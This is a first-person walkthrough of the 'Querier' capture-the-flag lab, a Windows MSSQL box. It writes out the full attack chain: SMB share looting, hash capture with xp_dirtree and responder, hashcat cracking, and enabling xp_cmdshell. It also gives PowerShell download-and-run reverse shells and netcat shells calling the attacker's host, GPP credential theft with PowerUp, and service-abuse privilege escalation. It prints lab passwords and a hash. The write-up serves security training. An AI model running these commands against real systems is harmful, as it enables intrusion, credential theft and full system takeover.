Overview
Querier is a Windows Server box running Microsoft SQL Server 2017. I was able to gain initial foothold by leveraging credentials found in an excel spreadsheet found by accessing an open smb share. The credentials were used to connect to sql via a command line tool which was used to run xp_dirtree to capture the sql service account (mssql-svc) hash with responder. I was able to successfully crack the hash for the service account and connect to sql again with permissions to enable xp_cmdshell. Using xp_cmdshell I was able to create a reverse shell allowing access the box. I ran PowerUp and found the administrator password stored in a group policy file. I was then able to use those credentials with evil-winrm to get a shell as administrator. Another result from PowerUp showed an alternative method for privilege escalation using the Invoke-ServiceAbuse function. Invoke-ServiceAbuse was used to run a command under the context of the ‘USOSvc’ service account and gain a shell as ‘nt authority\system’.
Enumeration
Software
- Microsoft Windows Server 2019 Standard 10.0.17763 N/A Build 17763
- Microsoft SQL Server 2017 (RTM) - 14.0.1000.169 (X64)
Port Scan*
nmap -sT -A -p- -v 10.10.10.125 -oN _full_tcp_nmap.txt
- 445/tcp - smb
- 135/tcp - Windows RPC
- 139/tcp - netbios-ssn
- 1433/tcp - mssql
- 5985/tcp - winrm
- 47001/tcp - http
- 49664/tcp - Windows RPC
- 49665/tcp - Windows RPC
- 49666/tcp - Windows RPC
- 49667/tcp - Windows RPC
- 49668/tcp - Windows RPC
- 49669/tcp - Windows RPC
- 49670/tcp - Windows RPC
- 49671/tcp - Windows RPC
SMB Map
smbclient -L //10.10.10.125 -N
[+] IP: 10.10.10.125:445 Name: querier
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ READ ONLY
Reports READ ONLY
Steps (user)
Looking at the smb shares there was only one that isn’t there by default - Reports.
smbclient //10.10.10.125/reports -N
Browsing to this share showed a single excel filed called ‘Currency Volume Report.xlsm’. I downloaded it to take a look.
mget "Currency Volume Report.xlsm"
Opening the document I received a warning about macros which was interesting so I went to tools | macros | edit macros to take a look. I came across some code included a connection string containing a username and password. reporting:PcwTWTHRwryjc$c6 |
Using Impacket’s mssqlclient.py I connected to the database using the credentials found in the excel spreadsheet.
~/tools/impacket/examples/mssqlclient.py 'reporting:PcwTWTHRwryjc$c6@10.10.10.125' -windows-auth
I ran some commands but did not find any useful information and the volume database looked to be empty
List users
select NAME from master..syslogins
List databases
select Name from master..sysdatabases
List all tables in database ‘volume’
select * from information_schema.tables
I tried enabling xp_cmdshell which can be used to execute os commands but received an error that I did not have permission to perform this action.
However I did have the ability to run xp_dirtree. This is an extended stored procedure used to list files and folders and can be used along with responder to capture hashes.
I started responder specifying the tun0 interface to listen on.
responder -I tun0
From the mssql session I ran xp_dirtree and specified the UNC path to my box and successfully captured the hash for service account: mssql-svc
xp_dirtree "\\10.10.14.17\share"
[SMB] NTLMv2-SSP Client : 10.10.10.125
[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMB] NTLMv2-SSP Hash : mssql-svc::QUERIER:f97a300da97ff3b4:18F59F380C8A423816FD150517D46C9C:0101000000000000C0653150DE09D2018A9DE404451DCBDE000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000300000278ED8F7EF7D293F40D5865C093423B3179A70BA8F58D2956100F5DA51ED03D90A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0031003700000000000000000000000000
I copied the hash to a file called ‘hash.txt’ and fed it into hashcat setting it to use the rockyou wordlist and -m 5600 for NetNTLMv2.
A nice write-up called LM, NTLM, Net-NTLMv2, oh my! that does a good job of explaining the differences between the hashes.
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --force
I was now able to connect to the sql server using mssql-svc:corporate568 and this account had permission to enable xp_cmdshell.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
As a test I pinged my box first, I ran tcpdump specifying my tun0 interface and to only listen for icmp.
sudo tcpdump -i tun0 icmp
I then ran xp_cmdshell along with the command to ping my machine once.
EXEC xp_cmdshell 'ping -n 1 10.10.14.21'
I received a ping from the target which confirmed that I was able to run commands and communicate outbound to my box.
Nishang’s Invoke-powerShellTcp was copied to my local working directory
cp ~/tools/nishang/Shells/Invoke-PowerShellTcp.ps1 .
I set up python http server (python3 -m http.server 80), re-enabled xp_cmdshell (resets every so often) and ran the command to create a reverse shell.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString("""http://10.10.14.21/Invoke-PowerShellTcp.ps1""");Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.21 -Port 4200"'
I received a callback and shell as user mssql-svc
Steps (root/system)
I copied PowerUp.ps1 to my working directory to look for potential privilege escalation paths
As stated by the creator, PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations
cp ~/tools/PowerSploit/Privesc/PowerUp.ps1 .
I started a python http server (python3 -m http.server 80) on my box and called Invoke-Expression from the target to run PowerUp.Ps1 in memory, calling the Invoke-AllChecks function.
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.21/PowerUp.ps1');Invoke-AllChecks"
There were a number of results including a username and password that was found in group policy file. administrator:MyUnclesAreMarioAndLuigi!!1!
I then used evil-winrm with thw new credentials and got a shell as administrator
Steps (root/system - alternate #1)
Going back to the PowerUp results, there was another privilege escalation path using ‘usosvc’ which had weak permissions. Using Invoke-ServiceAbuse I was able to set the service to execute a netcat command to create a reverse shell.
I created a share using impacket’s smbserver.py in prepration to transfer files
sudo ~/tools/impacket/examples/smbserver.py share `pwd` -smb2support
I copied nc.exe to the target
copy \\10.10.14.21\share\nc.exe
I once again used IEX to run PowerUp.ps1 in memory, calling the Invoke-ServiceAbuse function. I specified the vulnerable service name (usosvc) and the command to create a reverse shell with netcat.
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.21/PowerUp.ps1');invoke-serviceabuse -name 'UsoSvc' -force -command 'c:\users\mssql-svc\nc.exe -e cmd 10.10.14.21 4201'"
I received a callback with shell as ‘nt authority\system’
Steps (root/system - alternate #2)
There is another privilege escalation path that can be accomplished by adding mssql-svc to the local administrators group. Because of UAC Remote Restrictions there was another step required before I could log on via evil-winrm.
Once the reverse shell was established, I added mssql-svc to the local administrators group
Invoke-ServiceAbuse -name 'UsoSvc' -force -command 'net localgroup administrators mssql-svc /add'
I then had to disable UAC Remote Restrictions
invoke-serviceabuse -name 'UsoSvc' -force -command 'cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1'
And I could establish a connection via evil-winrm with the mssql-svc account with full administrator access.